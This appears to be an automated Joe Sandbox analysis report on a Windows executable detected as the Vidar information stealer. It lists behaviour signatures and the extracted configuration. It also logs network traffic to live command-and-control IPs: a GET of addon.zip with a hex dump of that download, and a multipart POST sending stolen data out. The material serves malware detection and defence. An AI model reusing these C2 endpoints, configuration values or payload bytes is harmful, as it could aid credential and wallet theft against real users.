Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
06625899.exe

Overview

General Information

Sample Name:06625899.exe
Analysis ID:877001
MD5:22cd094d925fb41f446ed4db24cc8c35
SHA1:c316b3fa0e1357ed5815002b0354e8503d5ee038
SHA256:9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 06625899.exe (PID: 7120 cmdline: C:\Users\user\Desktop\06625899.exe MD5: 22CD094D925FB41F446ED4DB24CC8C35)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          0.2.06625899.exe.2320e67.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0.2.06625899.exe.2320e67.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.3.06625899.exe.2380000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.06625899.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.3.06625899.exe.2380000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}
                    Source: 06625899.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00415040 CryptUnprotectData,LocalAlloc,LocalFree,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00409EC0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00415180 _malloc,_malloc,CryptUnprotectData,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00401430 _memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00414D80 _memset,lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00414FC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\06625899.exeUnpacked PE file: 0.2.06625899.exe.400000.0.unpack
                    Source: 06625899.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2
                    Source: Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
                    Source: Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0040D1C0 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,_strlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                    Networking

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49685
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199508624021
                    Source: Malware configuration extractorURLs: https://t.me/looking_glassbot
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Joe Sandbox ViewIP Address: 188.34.154.187 188.34.154.187
                    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                    Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                    Source: global trafficHTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                    Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficTCP traffic: 192.168.2.3:49685 -> 188.34.154.187:30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:46:23 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.88.46.113
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.88.46.113
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.88.46.113
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.34.154.187
                    Source: 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/
                    Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303//
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/:
                    Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/CVOHV.xlsx
                    Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/T
                    Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/addon.zip
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/addon.zip&u;y
                    Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/addon.zip0
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/addon.zip=u&y
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/e5
                    Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303/n
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.34.154.187:30303;
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed8
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3edx
                    Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113:80
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113:80/
                    Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0
                    Source: 06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.46.113:8A
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed
                    Source: 06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: 50764714324176067669882221.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 50764714324176067669882221.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 50764714324176067669882221.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 50764714324176067669882221.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
                    Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
